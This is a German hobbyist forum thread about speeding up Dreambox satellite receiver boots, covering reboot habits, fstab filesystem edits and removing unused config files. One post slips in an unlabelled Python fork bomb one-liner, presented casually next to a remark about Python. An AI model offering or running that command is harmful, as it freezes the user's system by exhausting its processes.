Bootvorgang beschleunigen

  • RE: Bootvorgang beschleunigen

    ja gibt es nur gibt es auch bald einen neueren kernel und solange es den neuen kernel nicht gibt werden wir da nichts machen :D


    also ich boote meine boxen 2 8k und 2 800er wenn es hochkommt 1 mal im monat
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • RE: Bootvorgang beschleunigen

    Da bin ich als Schwabe zu geizig :teach:

    Spass

    Ich boote einmal täglich und nach Gebrauch wird runtergefahren. Hab das Teil an einer Master/Slave steckdose und steure damit den Rest.

    Wäre halt schön wenn die Bootzeit endlich mal aufn erträgliches Niveau runtergeht. Wie man da hinkommt, ob miitels Pugin oder den Imageaufbau grundlegend ändert, ist eigentlich schnuppe, oder? Dass es funktioniert sieht man ja.

    Neuen Kernel? Gibts schon n ca Termin?

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von hilde ()

  • RE: Bootvorgang beschleunigen

    Original von hilde
    Da bin ich als Schwabe zu geizig :teach:

    Wäre halt schön wenn die Bootzeit endlich mal aufn erträgliches Niveau runtergeht. Wie man da hinkommt, ob miitels Pugin oder den Imageaufbau grundlegend ändert, ist eigentlich schnuppe, oder? Dass es funktioniert sieht man ja.


    ich finde es erträglich :D der aufwand um 10 sek rauszuholen finde ich steht in keiner realität


    Neuen Kernel? Gibts schon n ca Termin?

    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • naja

    ich boote meine 7025 einmal täglich. Wenn ich nach Hause komme schalte ich die Anlage ein. Dann mach ich mich erstmal fertig. Umziehen, waschen etc
    Von daher ist es mir egal ob die Box eine oder fünf Minuten braucht

    Aber prinzipiell freut man sich natürlich trotzdem an jeder Verbesserung
  • Ach leute ich muss da nix zustimmen die paar sekunden bootzeit mehr oder weniger juckt doch garnet.
    Python ist ein Live Interpreter das heisst änderungen am source werden beim gui restart mit übersetzt das kostet cpu zeit beim start dafür ist es extrem flexibel.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Original von neugierige
    hi gibt es schon eib fertiges image zum testen? von i-have-a-dreambox???


    Also das brauchst kein fertiges Image. Plugn installieren und gut is.

    Funktioniert sogar mit Newnigma :P


    Mich jedefalls nervt die lange Bootzeit.
    Ich versteh nur nicht warum manche Leute immer konsequent gegen etwas sein können. :O
  • Hallo erstmal,
    ich frage mich, warum ihr eure Dreamboxen so oft bootet.
    Nehmt ihr keine Sendungen damit auf, oder ist das nur wieder so ein Stromsparwahn?
    So einen hohen Stromverbrauch haben die Boxen im Standby nun auch wieder nicht.

    Ich habe drei Boxen die alle im Standby laufen und fleissig Filme auf einen zentralen NFS-Server aufnehmen, so dass ich garnicht auf die Idee komme ständig zu booten.
    Es reicht doch eigentlich völlig aus, die Dinger einmal im Monat neu zu booten, z.B. bei einer neuen Imageversion, oder nicht?

    Gruß
    Galsty
    - 1x DM8000ssss HD PVR NN2 Unstable v. 30.12.2012
    - 2x DM800s HD se NN2 V3.3.2
    - 2x 2TB Eisfair2 NFS, Gigabit-LAN
    - FUBA DAA 850 auf Astra 19.2E
    - Inverto Black ULTRA QUATTRO LNB
    - Multischalter 5/12 Spaun SMS 51203
  • Hi

    meine 7025 nimmt auch aus dem DeepStandby auf ;)

    Bei ner 600 oder 800 würde ich die natürlich auch im SB lassen

    Aber ich verstehe diese ablehnende Haltung nicht. Warum haben wir denn unsere Dreamboxen? Doch weil sie so frei konfigueirbar sind und man so viel verbessern kann. Ob die Verbesserungen für alle User relevant sind ist doch vollkommen unerheblich, so lange es genug interessierte gibt das sich die Entwickler dessen annehmen

    Die Dreams sind nunmal Bastelboxen, und das ist auch gut so :)

    Ansonsten könnt ihr euch ja nene Plug&Play receiver holen der keine Möglichkeiten bietet. Am besten gleich einen Premiere-/Sky zertifizierten :D

    Eigentlich freuen wir uns doch alle wenn wir was neues zum spielen haben :) Und manchmal ist es auch einfach nur die Herausforderung, um zu sehen was geht

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von std ()

  • Hi

    mal eine Frage:

    in der WIKI steht:

    * in /etc/fstab beim hda-Eintrag auto auf ext3 ändern


    meine Datei sieht jetzt so aus:

    /dev/hdc2 / ext2 defaults 1 1 proc /proc proc defaults 0 0
    devpts /dev/pts devpts mode=0620,gid=5 0 0
    usbdevfs /proc/bus/usb usbfs defaults 0 0
    tmpfs /var tmpfs rw,size=10M 0 0
    tmpfs /tmp tmpfs rw,size=10M 0 0
    /dev/hda1 /media/hdd auto defaults 0 0
    /dev/hdc3 /media/cf auto defaults 0 0
    /dev/hdc1 /boot auto defaults 0 0


    muss ich die Defaults auch ändern?

    Und warum steht da "/dev/hdc2 / ext2"
    Formatiert der CF-Installer nicht in ext3?

    Könnte ich hdc1 und hdc3 eientlich auch gleich ändern. Die Frage ist nur ob in ext2 oder ext3

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von std ()

  • Hi

    habe jetzt die manuellen Änderungen die in der WIKI empfohlen werden umgesetzt

    Da ich Kabelempfang habe bringen

    - das rausschmeißen der satellites.xml und terrestrial.xml
    - löschen aller Sprachen außer Deutsch
    - ändern von hdc1 und hda auf vfat bzw ext3

    15 Sekunden. Die Bootzeit bei der 7025+ verkürzt sich von 1.45 Min auf 1.30 Min

    hdc2 habe ich noch nicht geändert da ich nicht weiß welches Filesystem diese Partition hat
  • hmh keine Ahnung. Kenn mich mit der 7025 leider net aus.


    Aber für den Rest:

    Zitat gutemine:

    Dieses Image bootet dann in 44 sec vom Drücken des Power Fenbedienungsknopfes oder des Powerknopfes an der Frontseite !

    Dabei sieht man 20sec das /flash/vmlinux.gz im OLED; dann 14sec schwarz bis der Fortschrittsbalken kommt und dann nach 10 sec hat man Bild und Ton auf einem FTA Sender.
    .
    .
    .
    .

    Womit das dann schon verdammt nahe bei den wahrscheinlich nur mehr theoretisch möglichen 30 sec wäre. Womit wir dann schon manche nicht Linux Festplattenreceiver überholen würden.


    Soviel zum Thema warum der Ganze Aufwand wegen 10sek Bootzeitverkürzung :baby:


    Finds kurzum ne coole Sache, dass sich jemand die Mühe macht und würd mich freuen wenn zumindest Teile davon auch iirgendwann in Newnigma zum tragen kämen.

    Greetz Hilde